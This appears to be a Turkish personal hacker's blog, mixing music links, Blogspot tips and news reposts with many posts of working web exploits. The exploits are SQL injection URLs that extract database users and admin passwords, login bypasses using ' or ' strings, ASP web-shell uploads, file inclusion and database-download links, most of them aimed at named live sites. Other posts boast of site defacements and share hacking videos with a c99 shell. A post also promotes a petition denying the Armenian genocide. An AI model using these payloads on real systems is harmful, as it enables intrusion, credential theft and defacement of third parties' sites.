orhan hakalmaz - gafil gezme şaşkın

orhan hakalmaz bu türküyü süper seslendirmiş bence muhakkak dinleyin

Gafil Gezme Şaşkın ( insan yetiştiren türküler ):

TIKLA iNDiR


İnsan Yetiştiren Türküler Albümün Tamamı:

TIKLA iNDiR

Niçin Experl.com

aşağıdaki yazıyı okuyunca ekstra bir açıklamaya gerek olmadığını sizlerde anlıycaksınız.

kaynak: http://www.experl.com/experl-nedir/

Bazen odamızda oturup filozoflar ya da derin düşüncelere dalan adamlar gibi ne yapmaya çalıştığımızı anlamaya çalışırız. Yine böyle bir günün ardından ortaya çıkmış bir oluşum Experl..

Bu projeye başlarken her şeyi göze aldık. Her şey insana o kadar çekici geliyor ki, önünüzdeki olanaklardan birini seçtiğinizde tüm diğerlerine hayır demeniz gerekiyor. Biz Experl'i seçtik. Çünkü başarılı olmanın anahtarının tek bir noktaya odaklanmak olduğunu biliyoruz. Zamanımızın kısıtlı olduğunu,ve bu hedefle başkalarının düşüncelerinin sonuçlarıyla yaşam dogmasına takılıp artık başkalarının hayatını yaşayarak kısıtlı olan zamanımız harcamayacağımızıda biliyoruz.Yeteneğimizin ne olduğunu, nerede başarılı olabileceğimizi anlıyoruz, zamanımızı ve enerjimizi buraya yönlendiriyoruz.

Biz eğitimci değil öğrenciyiz. Öğrenen insanlarız. İşimizin en sevdiğimiz yanlarından biri de etrafta bizler gibi öğrenmeye meraklı ve arzulu olan insanların çokluğudur.

Experl'deki yazarların hepsi de işin içinde büyüyüp gelişmiş üstün zekalı insanlardır. İnsanı şaşırtan bir ekip. Buradaki insanların hiçbiri kendilerini zorlamıyor, pozisyon ve durumlarını umursamıyorlar ya da dışarıdan nasıl göründüklerine aldırmıyorlar.

Experl olarak çoğu zaman konuşur, tartışır ve hemen her zaman fikir birliği içinde oluruz. Şaşırtıcı olan şu ki önümüzdeki yıllara baktığımızda geçmiş olan yıllardan çok daha fazla şeyler yapabileceğimize inanıyoruz...

Bazıları bizim bu durumumuzdan şikayetçiler. Bizleri geleceğimizi bir kutuya bağlayan gençler olarak adlandırıyorlar. Eğer derbederlik ve çaresizlik bilgisayar başında gece yarılarına kadar oturup çalışmak, bazı araştırmalar yapmaksa o zaman bu tanım bize uyar. Bu tanımın da bizi küçülten bir kavram olduğunu düşünmüyoruz. Yine bazıları hala bu makine den altın geldiğini görmek ve bunu merak etmek yerine, bu altın külçelerini tuğlalar gibi dizmekten söz ediyorlar. O kadar olumsuz düşünceye rağmen biz bu işte sonuna kadar gitmeye kararlıyız. Çünkü sahip olacağımız en yüksek performans o yolun sonunda...

Yazılım üretmek bir sanat ve mühendislik arasında güzel bir iş birliği gerektirir. İşi bitirdiğin, ortaya çıkan eseri beğendiğin, taktir ettiğin zaman sanki kendinden bir şeyler oluşturmuş gibi hissedersin. Bizler bu heyecanı her an yaşayan bir oluşumuz...

Şunun da bilincindeyiz. Bize her zaman duvar olacak insanlar var olacak karşımızda. Ama bir gerçek var ki; ister seversin, ister nefret edersin ama Experl'i görmezden gelemezsin!

Experl || Just Run

pagerank 1 bahiyim valla 1 :)

aha da bana yılbaşı hediyesi. son bir şansımı deneyeyim dedim bi kontrol ettim pagrankı valla pagerank 1 olmuş :D hayırlı olsun :P

abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj

abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt

link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/

Discovered By: ZoRLu

Exploit: ( remote )

http://localhost/script_path/content.php?cat=[SQL]

[SQL]=

-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--


exploit for demo: ( you must look title )

http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--


Exploit: ( blind )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )


exploit for demo:

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )

abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj

abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj

link: http://packetstormsecurity.org/0812-exploits/abarcarmanu-sql.txt

link: http://www.experl.com/abarcar-manufacturer-system-script-plistingsphp-listingid-blind-remote-sql-inj-353/

Discovered By: ZoRLu

Exploit: ( remote )

http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=[SQL]

[SQL]= 

-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--


exploit for demo:

http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--


Exploit: ( blind )

http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )

http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )


exploit for demo:

http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )

http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )

experl.com

artık böyle önemli olduğunu düşündüğüm bilgileri experl.com dada paylaşacağım nasipse. hayırlı uğurlu olsun.

a.q a.q a.q bu ödevlerin

küfretmekten ağzımın ayarı bozuldu mıçacam böyle işin ağzına :@ bir yandan ödevler diğer yandan kpss, ömrümü yediniz ulan :((

sloganların cızıdan çıktığı an : )

şöyle geziniyordum nette dikkatimi bir şey çekti. bloglar ve sloganlar.

inceleyelim:

kendi bilöngüm xD



beyn.org xD



henster.org xD



deliprofesor.com xD



bunlar şuan aklıma gelenler xD varın gerisini siz tahmin edin ;)

Blogspotta kod alanı oluşturma

yerleşim>>>html düzenle>>> ve ardından su kodu buluyoruz:



bunun öncesine de su kodlarımızı ekliyoruz:

pre { background: url(http://i39.tinypic.com/2airndc.jpg);border:1px solid #A6B0BF;font-size:120%;line-height:100%;overflow:auto;padding:10px;color:white }pre:hover {border:1px solid #efefef;}code {font-size:120%;text-align:left;margin:0;padding:0;color: #000000;}.clear { clear:both;overflow:hidden;}

bu kadar

şimdi gidiyorum kullanımınıda yarın gösterecem

edit: yarın gösterecem demiştim :)



seklinde kullanacaksınız

Tuncay Güney Kurtlar Vadisi'nde

msn yaşamda gözüme çarptı ilerleyen bölümlerde tuncay güney kurtlar vadisinde rol almaya başlayacakmış:

Bugün Gazetesi yazarı Nuh Gönültaş, Tuncay Güney'in Kurtlar Vadisi’nde oynamaya hazırlandığını yazdı. İşte o yazı...

Kurtlar Vadisi Pusu ekibi, dizide oynaması için Tuncay Güney'e teklifte bulundu. Polat Alemdar'ın İskender Büyük'ün kirli işleri ve sırları konusunda Güney'den bilgi alması tasarlandı.

Büyük'ün Ergenekon'daki Küçük'ü simgelediğine seyirciler inanıyor.

Senaryoya göre, Güney ile Alemdar yakında Toronto'da buluşacaklar... Bu rol için Güney'e 25 bin dolar oyunculuk ücreti ödenecek... Bu arada Muro ve ekibi de Kanada'da saklanacaktı ki, dizinin Show TV'den kaldırılması nedeniyle çekimler ertelenmiş durumda.

Güney, şu sıralar kaldığı evden çıkartılması için mahkemeye verildi. Maddi olarak zor durumda. Mahkeme üç ay süreceği için evden çıkmıyor. Güney, Ergenekon Terör Örgütü'nün Türkiye'den kendisini öldürmesi için suikast timi göndermesinden korkmuyor, ancak ABD'de New York'ta meskun tetikçi timinin gönderilmesinden çekiniyor.

Türkiye'deki muhtemel tetikçi ekiplerin isimlerini Kanada İstihbaratı CSIS'e verdiği için içi rahat. Kanada Konsolosluğu'ndan vize alamayacaklarını biliyor. Ancak Ergenekon'un ABD vatandaşı olmuş tetikçileri bulunuyor. Bu ekiplerin ABD'den Kanada'ya geçmesi çok kolay. Bunlardan bildiği isimleri CSIS'a vermiş, ellerini kollarını bağlamış. Ama bilmedikleri de elbette var. FBI, CIA ve CSIS tetikteler.

Bu arada MİT'in dosyasını devam eden Ergenekon mahkemesine göndermemek için gerekçe uydurmasına keyifli keyifli gülüyor. Mahkeme heyetinden bir savcı Güney'in ifadesini almak için resmi başvuruyu başlatmış olmalı ki, Güney'e bu istek bildirilmiş ve rızası alınmış. Sanık yapılsaydı konuşmayacak olan Güney, tanık olmaktan memnun ve savcının sorduğu her soruya cevap vermeye hazırlanıyor. MİT'in kendisi ile özel bir kanalla irtibat kurup kırmızı çizgiler çektiği de gelen bilgiler arasında.

Bu derin kulis bilgileri, Toronto'da yaşayan gazeteci dostum Kara Kutu: Ergenekon'un Karanlık İsmi Tuncay Güney kitabının yazarı Faruk Arslan'dan aldım.

Güney'in Arslan'a söylediği JİTEM'in asit ölüm çukurlarını ilk defa bu köşede 16 Kasım'da okudunuz. Daha sonra bu haberi alıntı yapmayan medya organı kalmadı.

Haberin üzerine giden gazeteciler ölüm kuyularının şahitlerini konuşturdular. Yıllardır sinen, korkan mağdur vatandaşlarımızda bir umut belirdi. Çünkü Şırnak Avukatlar Barosu'nun bu kitabı delil göstererek yaptığı suç duyurusunu dikkate alan Silopi Cumhuriyet Başsavcılığı 15 Aralık'ta BOTAŞ asit kuyuları ve diğer ölüm kuyularının açılmasına karar verdi. Mağdurlar birer ikişer savcılık ve baroya başvuruyor. Karanlık bir dönemin cinayetlerinin aydınlanması, bölgedeki vatandaşımızın devletine olan güvenini artıracak, korku imparatorluğu sona erecektir.

Diyarbakır'da devam eden Jİ- TEM davasının Ergenekon davası ile birleştirilmesi kaçınılmaz hale geliyor. Şehit Albay Özden cinayeti dosyasının yeniden açılması ve Ergenekon davası ile birleştirilmesi JİTEM davalarının Ergenekon davasına eklenmesine ilk yeşil ışıktı. Garih cinayeti dosyasının yeniden açılması da esasen başka bir Ergenekon cinayetinin tozlu raflardan indirilmesi anlamına geliyor.

Arslan'ın sivil baron adayı ile ilgili verdiği ip uçları ilginç. Kitaptan takip edelim:

Bizim lider, 'neocon'ların en aşırı kanadına bağlı, bir Cumhuriyetçi. Diğer derin Amerikan devletlerinin çatışması sırasında 'neocon'lar, Irak savaşında yaşanan fiyasko sonrası etkinliğini göreceli yitirdi. Türk liderde geri adım atmak zorunda kaldı. Askeri ve sivil liderler, ılımlı Washington'un uyarılarına rağmen, AK Parti'yi devirmek için, söz konusu çeteyi başındaki generallerle 2001'de görevlendirdiklerine pişman oldular. (Devam edecek, asker-sivil 1numaraların özellikleri...)

kaynak: http://msnyasam.milliyet.com.tr

CSS ile arka plandaki (background) resmi sabitleme

background-attachment: scroll or fixed;

kodumuz bu eğer sabit kalsın istiyorsak:

background-attachment: fixed; olcak

hareket etsin istiyorsak

background-attachment: scroll; olcak

ZoRLu hacklendimi yoksa :D

yok bre merak etmeyin sadece şablonda bi kaç değişiklik yapmaya çalışıyorum istediğim rengi tutturana kadar böle değiştirip durcam kusura bakmayın :D

Çok Güzel Hareketler Bunlar - Rulet Star

Çok Güzel Hareketler Bunlar Rulet Star

part 1: http://www.youtube.com/watch?v=-HXT6jGomf8

part 2: http://www.youtube.com/watch?v=TClyo5Hi6ts

hikayeler.net hacked

hikayeler.net te bir açık buldum ve videoya aldım videoyu yayınlamadan önce site sahiplerinin iletişime geçmesini bekleyeceğim. daha sonra videoyu yayınlarım ;) site asp kodlanmış server win. fakat ana dizine yazma yetkisi yoktu.

site: http://hikayeler.net/forum

zone 1: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8458948/

zone 2: http://www.turk-h.org/defacement/view/313443/hikayeler.net/forum/

çok güzel hareketler bunlar - kız isteme ( hıyarlı baba )

izlerken gülmekten altıma yaptığım (!) :D süper bir skec. tavsiye ederim muhakkak izleyin.

link 1: http://www.youtube.com/watch?v=4QgkUK7Jw-A

link 2: http://www.youtube.com/watch?v=pN6XSFAe4PU

http://www.metallica-team.com

w0cker kankamın açtığı süper site hepinizi bekliyoruz ;) üye olmayı ihmal etmeyin. kanka hayırlı olsun :D

kurtlar vadisi

yav kaç hafta oldu 50. bölüm yayınlanmıyor üç kuruş daha fazla para almak için başka kanallarla anlaşmaya çalışıyorlarmışta falanmışta filanmış :S gelde a.q deme :(

servicetelecom hacked ;)

link: http://servicetelecom.com.br/

zone: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8435881/

link: http://blog.servicetelecom.com.br/

zone: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8435874/

link: http://helpdesk.servicetelecom.com.br/

zone: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8435875/

E-Learning Portal Remote File Upload

E-Learning Portal Remote File Upload

link 1: http://www.exploiter5.com/all.php?id=47

link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt

Discovered By: ZoRLu 

exp:

http://www.preprojects.com/elearning/uploaded/your_shell.asp

you register to site

login this site

after upload you_shell.asp

exp for demo:

register:

http://www.preprojects.com/elearning/new_student.asp

login:

role: select STUDENT

user: zorlu

passwd: zorlu1


shell

http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )

server daki siteler:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git


buda golden gate:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM

E-SMART CART Remote File Upload

E-SMART CART Remote File Upload

link 1: http://packetstormsecurity.org/0812-exploits/esmartcart-upload.txt

link 2: http://www.exploiter5.com/all.php?id=48

Discovered By: ZoRLu

exp:

http://localhost/script/embadmin/base_ads/[id]_shell.asp

exp for demo:

http://preproject.com/GScart/embadmin/main_baseimage.asp?action=add 

you go to here and click to gozat button, select your_shell.asp and write link

after goo shell

http://preproject.com/GScart/embadmin/base_ads/zehir4.asp

Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns

Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns

link 1: http://packetstormsecurity.org/0812-exploits/presimple-sqldisclose.txt

link 2: http://www.exploiter5.com/all.php?id=46

Discovered By: ZoRLu

exploit for demo:

you go this link:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin

right click to on photo and you must see

http://preproject.com/pgallery/pimages/4

column number 4

and you goo this links

username:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin

http://preproject.com/pgallery/pimages/admin

password:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin

http://preproject.com/pgallery/pimages/admin

so for demo:

username: admin

password: admin


exp for demo: (DD)

http://preproject.com/pgallery/database/photo.mdb 

PRE Asp Job Board (Auth Bypass)/DD Multiple Remote Vulns

PRE Asp Job Board (Auth Bypass)/DD Multiple Remote Vulns

link 1: http://www.exploiter5.com/all.php?id=45

link 2: http://packetstormsecurity.org/0812-exploits/preasp-sqldisclose.txt

Discovered By: ZoRLu   

exp for demo: (bypass)

login:

http://preproject.com/preaspjobboard//Employee/emp_login.asp

user: ZoRLu

passwd: ' or ' 1=1--

exp for demo: (DD)

http://preproject.com/preaspjobboard/db/pre.mdb

ozurdilemiyoruz.com

o satılmıs serefsiz siteye ( reklam yapmamak için link vermedim ) karsı duyarlı bir grubun açmıs olduğu site ve bende sonuna kadar destekliyorum ;) sizlerde gidin ve imzalayın sizlerde destekleyin lütfen. şimdilerde satılmış bazı aydınlar ermeni soykırımı uydurmasını kabul ettiklerini ve bunun için ermenilerden özür dilediklerini belirtiyorlar. böyle aydınlar olmaz olsun. böylelerine lanet olsun. şimdi bizlerde vatandaşlık görevimizi yapıp tepkimizi gösterelim

TIKLA SENDE iMZALA





BİZLER TÜRK AYDINIYIZ!
ÜSTELİK AYDIN KİMLİĞİMİZİ EMPERYALİST SOYTARILARA HİZMET İÇİN DEĞİL,
TÜRK HALKININ HAKLARINI KAN EMİCİLERE KARŞI KORUMAK İÇİN KULLANIYORUZ.

BİZİM KİMSEYE VERECEK BİR ÖZÜRÜMÜZ YOK.

ANCAK, ATALARIMIZA VE KARDEŞLERİMİZE KATLİAM YAPANLARDAN SORACAK BİR HESABIMIZ VAR.

BU HESAP IRKÇI-FAŞİST BİR SÖYLEMİN UZANTISI DEĞİLDİR.
BU HESAP; ÇANAKKALE SAVAŞINDA YARALADIĞI DÜŞMANINI SIRTINA ALIP SAHRA HASTANESİNE YETİŞTİRMEYE ÇALIŞAN
BİR İNSANLIK İBRETİNİN YANSIMASIDIR.

BİZLER, BÖYLE ATALARI OLDUĞU İÇİN UTANÇ DEĞİL GURUR DUYAN
BİR MİLLETİN ÇOCUKLARIYIZ.

İNSANLIK ADINA PEK ÇOK İYİ DİLEKLERİMİZ VAR.
ANCAK, BU KONUYLA İLGİLİ İSTEDİĞİMİZ TEK ŞEY;
BÜTÜN MİLLETLERİN DÜŞMANLARINA TÜRK GİBİ MERHAMETLİ YAKLAŞMASIDIR.


Gerçek Türk Aydını

Blogspotta Üst Köşeye Bayrak Eklentisi

şimdi öncelikle blogspot.com dan giriş yapın ve yerleşimden html yi düzenle yi seçin. daha sonra css kodlarınızın arasına su kodu ekleyin:



daha sonra "div" taglarının bulunduğu yerede şu kodu ekleyin:



sonra şablonu kaydedin tamamdır ;)

kodları indirebileceğiniz link:

TIKLA iNDiR

artık açık yayınlamıycam

a.q artık acık yayınlamıycam kendim zone kasacam böylesi daha güzel oluyor o yüzden milw0rm.com a biraz ara verdim ;)

root video ( for win Server )

e smart cms scriptinde bir acık bulmustum file upload yapılabiliyodu. bunu str0ke a da gönderdim hani 16 açık göndermiştimde yayınlanmamıştı ya işte o zaman :) ama bir başkası preproject scriptlerinde benim bulduğum acıkların birkacını farketmiş ve baska bir security sitesinde yayınlatmıs sorun değil demiştim ya çokta fifi : ) bekliyodum belki str0ke inadından vaz geçer de yayınlar ama o vaz geçmeden baskaları harekete geçti bile :D neyse gelelim videoya. açığı başka bir gün yayınlıycam işte win server da 201 site mevcuttu ama videoda bir ara 206 demişim ne alaka bende anlamadım :D ayrıca klavye hatalarımda var onlar içinde kusura bakmayın : )

TIKLA iZLE

rar pass: z0rlu.blogspot.com

hadi kolay gele

BosClassifieds hacking video

a.q rapid in azizliğine uğradık video silinmiş mi ne halt olmuşsa artık yoktu bende de yedeği yoktu yeniden aynı videoyu çektim. aynı sözleri tekrarlamak çok sıkıcı a.q :D neyse cafeden çekim yaptım aksilik vs rastlarsa kusura bakmayın. dosyada video, c99.php hazır hali ve txt mevcut video boyutu küçük ;)

TIKLA iNDiR


rar pass: z0rlu.blogspot.com

umarım faydalı olur. ;)

Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

link: http://www.milw0rm.com/exploits/7494

link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt

Discovered By: ZoRLu


exp for demo: (R-SQL)

user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin

pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin


exp for demo: (B-SQL)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)


exp for demo: (auth bypass)

http://joineazy.com/members/login.asp

username: trt-turk@hotmail.com

pass: ' or '


exp for demo: (admin bypass)

http://joineazy.com/embadmin/admin_main.asp

http://joineazy.com/embadmin/site_setup.asp

http://joineazy.com/embadmin/main_baseimage.asp


exp for demo: (RFU)

firs you register to site

login to site and edit your pictures select your shell.asp

go your shell asp:

http://joineazy.com/members/member_pictures/shell.asp

EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject

yayınlanma tarihine ve gönderilme tarihine dikkat edin ilk milw0rm.com a gönderdim :D

EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject

link: http://www.exploiter5.com/all.php?id=39

link: http://packetstormsecurity.org/0812-exploits/evimgibi-sql.txt

author: ZoRLu

dork: intext:"Asp Programlama : EvimGibi"

exploit:

http://localhost/script_path/resim.asp?islem=altkat&kat_id=[SQL]

[SQL]=

-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler

example:

http://www.sabanciogretmenevi.com.tr/album/resim.asp?islem=altkat&kat_id=-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler

z0rlu.ownspace.org

a.q pagerank ı yine bi kontrol edeyim dedim z0rlu.blogspot.com için baktım halen daha sıfır :S ta aylar önce açtığım z0rlu.ownspace.org ( çok emek vermiştim amk bebeleri kapadılar ownspace.org u :S ) pagerank ına baktım 4 :D

Böyle bi sacmalıga baslık bulamadım

okuduğum haberi mevcut yorum başlıklığıyla yayınlamak istedim çünkü yorumlayan kişi iyi bir başlık bulmus yorumuna. yok efendim obama yemin ederken vurulacakmış ya yaralanacakmış yada ölecekmiş rusya fırsattan istifade abd ye nükleer saldırı düzenleyecekmiş ve kıyamet kopacakmış :S ya işte Yüce Dinimiz İSLAM dan haberdar olmayanların acı durumu kıyametin kopacağına dair kehanetlerde bulunuyorlar. yahu kahin ne bilir kıyametin ne zaman kopacağını. ne diyelim ALLAH ıslah etsin işte haber :S

Amerika bugünlerde bir kehanete kilitlenmiş durumda. Bu tür şeylere inanmayanların bile içine kurt düştü. "Ya doğru çıkarsa?" tartışması sürüp gidiyor. Peygamber olduğunu ilan eden ünlü Amerikalı Mormon káhin Leland Freeborn, ABD başkanı seçilen Barack Obama’nın yemin etmeden önce öldürüleceğini ve ardından da Rusya’nın nükleer saldırısıyla ’kıyametin kopacağını’ iddia etti.

Peygamber olduğunu ilan eden ünlü Amerikalı Mormon káhin Leland Freeborn, ABD başkanı seçilen Barack Obama’nın yemin etmeden önce öldürüleceğini ve ardından da Rusya’nın nükleer saldırısıyla ’kıyametin kopacağını’ iddia etti.

ABD’de kehanetleriyle ünlü ve "Parowan Peygamberi" olarak tanınan Leland Freeborn, 44. Başkan seçilen Barack Obama’nın yemin etmeden önce ya öldürüleceğini ya da yaralanacağını ve ardından da hem isyanların çıkacağını hem de Rusya’nın nükleer saldırıda bulunacağını iddia etti.

Kehanetlerde bulunmayı bir kariyer haline getiren Leland Freeborn, müritlerine, "Bu Noel’de tam bir kıyamete hazır olun" çağrısında bulundu.

Freeborn, daha önce de Obama’nın başkanlık koltuğuna oturamayacağını öne sürmüştü. "Los Angeles Times" gazetesinin haberine göre, Freeborn, Barack Obama’nın yeminden önce ya öldürüleceğini ya da yaralanacağını savundu. Buna göre, Obama’ya yönelik saldırıdan sonra isyanlar çıkacak.

Kehanetlerini sürdüren Leland Freeborn, Rusya’nın bu durumdan yararlanmaya çalışacağını ve ABD’ye nükleer saldırıda bulunacağını iddia etti. Bu kıyamet saldırı ise 100 milyon Amerikalı’nın ölümüne yol açacak.

"Parowan Peygamberi" Rusya ABD’ye nükleer bomba yağdırırken kendisinin Wal-Mart’ta alışverişte olacağını da söyledi. Freeborn, bu kehanetlerini sürekli yayıyor.

kaynak: http://msnyasam.milliyet.com.tr

CFAGCMS v1 (right.php title) SQL Injection Vulnerability

gönderdiğim tarihe ve yayınlandığı tarihe iyi bakın : )

CFAGCMS v1 (right.php title) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7483

Discovered By: ZoRLu

exploit:
 
http://localhost/cfagcms/right.php?title=[SQL]
 
[SQL]=
 
ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

mumya 3

dün gece izledik ama mumya 1 ve mumya 2 le kıyaslanamaz bile. evet komik sahneler var ama filmin geneline baktığımızda baş rol oyuncular gölgede kalmış pekte güzel değildi :S a.q mahvetmişler o biçim filmi

Braveheart - The Legend Spreads

cesur yürekte duyduğum ve aklımda dırını nırını nırınınırını müziği olarak kalan ve hatta google ile youtube ta bile öyle arama yaptığım müzik : ) sonunda buldum. aslında güzel bir index müziği ;)

TIKLA iNDiR

Half Life

çok eski bir oyun olmasına rağmen ( ta lise yıllarında ilk tanışmıştım ) şimdilerde kendimi alamıyorum bu oyunu oynamaktan a.q :D 3-5 kanka bir araya gelince mekan belli :P counter hiç sarmıyo ama bu oyun süper :D aslında benim pek oyunla falan işim olmaz ama bu namussuz oyun başka :P tavsiye etmiyorum çünkü bağımlı hale gelebiliyo insan

Blogspotunuza 10 adımda milw0rm.com gadgeti ekleyin

milw0rm.com da yayınlanan son bugların sitenizde de gözükmesi açısından süper bir icat :P şimdi sırasıyla işlemleri takip edin:

1- blogspot.com dan giriş yapıyorsunuz.

2- açılan sayfada yerleşime tıklıyorsunuz ve yeni bir sayfa daha açıldı.

3- burda gadget ekleye tıklıyorsunuz

4- içerik takibi yazan bir gadget var ona tıklayın

5- açılan sayfada şunla karşılaşacaksınız:

"İçerik Takibi URL’si"

6- buraya http://www.milw0rm.com/rss.php bu linki yazın ve devam butonuna basın

7- sonraki aşamada kaç öğe gösterilsin tarih gösterilsin mi vs bunları seçin

8- kaydet butonuna tıklayın.

9- daha sonra oluşan gadgetiniz nerde görünsün istiyorsanız oraya taşıyın ve kaydet butonuna basın

10- bu maddeyide fazladan yazıyorum 10 adıma tamamlamak için :P

AutoCADHocasi.com 8 GB U3 Bellek Hediye Ediyor !

hediye gayet cazip : ) yapmamız gereken şeyde basit ya sitede yorum yazacan yada kendi sitende bu haberi yayınlıycan : ) ee madem bir sitemiz var bizde yayınlıyalım o zaman : ) işte detaylara ulaşabileceğiniz site: TIKLA

hannibal savaş filmi

ben pek beğenmedim savaşlar oluyor bitiyor siz görmüyorsunuz bile sanki strateji oyunu a.q :S bir tek şarap ve ateşle büyük bir kayayı patlatması hoşuma gitti güzel fikir ;) gerisi boş diyim inanın ama sonuçta emek söz konusu

easyphp 1.8 localhost

linux kullanmayanlar için bir nevi phpserver. php kaynak kodlu dosyalarınızı çalıştırabilirsiniz

iNDiR

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7392

Discovered By: ZoRLu

file:

_conf/core/common-tpl-vars.php

c0de:

require($confdir.'lang/langpack.'.$lang.'.php');  ( line 23 )

rfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?

lfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]

Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln

Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln

link: http://www.milw0rm.com/exploits/7390

Discovered By: ZoRLu

exp for demo: 

http://www.dotnetindex.com/demos/prodownloadmanager/admin/

user: ZoRLu

passwd: ' or '

ASPManage Banners (RFU/DD) Multiple Remote Vulnerabilities

ASPManage Banners (RFU/DD) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7373

Discovered By: ZoRLu

exp: ( rfu )

http://localhost/script/banners/shell.asp

exp: ( dd )

http://localhost/script/data/DataBase.mdb



rfu: ( for demo )

you go here:

http://demo.merlix.com/adbanner5/Upload.Asp

select your shell.asp

after click to upload button

go your shell.asp

http://demo.merlix.com/adbanner5/banners/xyz.asp


dd: ( for demo )

http://demo.merlix.com/adbanner5/data/DataBase.mdb

Kurban Bayramı

Tüm İslam Aleminin Kurban Bayramını şimdiden kutlarım. malum bayram günü nete giremem ;) Hayırlı Bayramlar

dj gülşah - çekgit bebeğim

beyaz show da dinlemiştim yayınlamak bugüne nasipmiş gayet hoş bir parça nakaratı

TIKLA iNDiR

ASP PORTAL (xportal.mdb) Remote Database Disclosure Vulnerability

ASP PORTAL (xportal.mdb) Remote Database Disclosure Vulnerability

link: http://www.milw0rm.com/exploits/7361

Discovered By: ZoRLu

exp for demo: ( DD )

http://demo.merlix.com/portal/xportal.mdb

